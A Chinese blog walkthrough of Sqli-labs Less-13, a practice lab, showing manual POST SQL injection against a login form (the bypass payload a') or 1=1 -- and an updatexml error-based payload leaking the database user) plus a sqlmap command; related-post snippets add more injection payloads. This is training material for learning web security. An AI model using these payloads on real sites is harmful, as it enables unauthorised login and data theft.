Sqli-labs靶场第13关详解[Sqli-labs-less-13]

已于 2024-03-02 20:28:32 修改
阅读量610 收藏 10
点赞数 12
分类专栏: sqli-labs 文章标签: 数据库 mysql sql 网络安全 web安全
于 2024-03-02 20:27:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136421444
版权
Sqli-labs-Less-13

#手工注入

post传参了

根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站

1. Username输入a' 测试是否会有报错,burp抓包

报错:syntax to use near ''a'') and password=('') LIMIT 0,1' at line 1

分析可知,username和password 的条件判断在一个where语句中;整条语句使用单引号加小括号  ") 闭合。

所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。只需填写username。

即payload:

a') or 1=1 --

成功登录!!!

根据返回值发现,如果登录成功将显示一个成功的图片。

所以联合查询尝试漏洞利用,使用order by 测试列数   当值=1时正常回显当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入

报错注入payload为:

a') and updatexml(1,concat(1,(select user())),3)--

爆出当前用户名!!!

成功利用漏洞!!!

#自动化注入-SQLmap工具注入

 SQLmap用户手册:用法 - sqlmap 用户手册

由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包  用-r 选择目标txt文件

python sqlmap.py -r data.txt -current-db

爆出当前数据库名称

成功管理用漏洞!!!

「已注销」
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
详细讲解双查询注入
weixin_34138255的博客
03-22 340
上一篇文章中,http://leaver.me/archives/2726.html我说双查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询,查询的键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Sel...
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 254
sqli - labs - 13 ~ 14
sqli-labs(less-13)
筱阳的博客
06-08 919
由less-12 可知  通过报错可知  是通过') 闭合的发现没有登入成功返回信息 ...看来是要盲注了...操作就像GET注入一样  只需要改union select 1,2 的信息即可盲注只能考虑sqlmap了......
sqli-labs靶场第十三
gou1791241251的博客
12-27 780
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注和报错注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-lab教程 less-13,14
xiaoyuhensuai的博客
07-09 313
这一题我们需要使用burp suite。首先我们在username和password中随便输入一串数字或字母,然后进入抓包开始操作。首先我们来对数据库名进行查询: 如下图所示:可以看出数据库名为“security” 接着我们来继续查询数据库有哪些: 如下图所示: 其次来查看security数据库中所有的数据表: 如下图所示:接着我们来显示users中的字段: 如图下图所示: 查找原SQL语句:$sql="SELECT username, password FROM users WHERE
sql-labtips 十三~十四
weixin_44089266的博客
04-09 307
**第十三为基于post提交的报错型注入,第十四于第十三基本相同,只是闭合方式的不同,只对第十三进行详解 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅 ** 由于是POST型注入,故需要使用burp进行代理抓包,以便修改其中传递的内容 尝试构造其闭合方式,先使用’单引号,查看其回显 可观察到提示sql错误语句。并且弹出了...
sql-lab(ALL 1-65)
lee_maple的博客
03-08 7685
less-1(基于错误的GET单引号字符型注入) id=1 //回显正常 id=1' //报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
sqli-labs-13
qq_53030229的博客
05-10 291
文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 摸鱼中,最近不知道干什么ε=(´ο`*)))唉 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 uname=234')order by 3--+ 三、获取数据库 uname=234') and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 uname=234') and
sqli-labs第十三--十五
小人物的博客
06-18 3257
第十三 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
Sqli-labs之Less-13和Less-14
→_→
04-05 1143
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
sqli-labs ————less -13
Fly_鹏程万里
05-11 986
Less -13源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 139
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1174
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值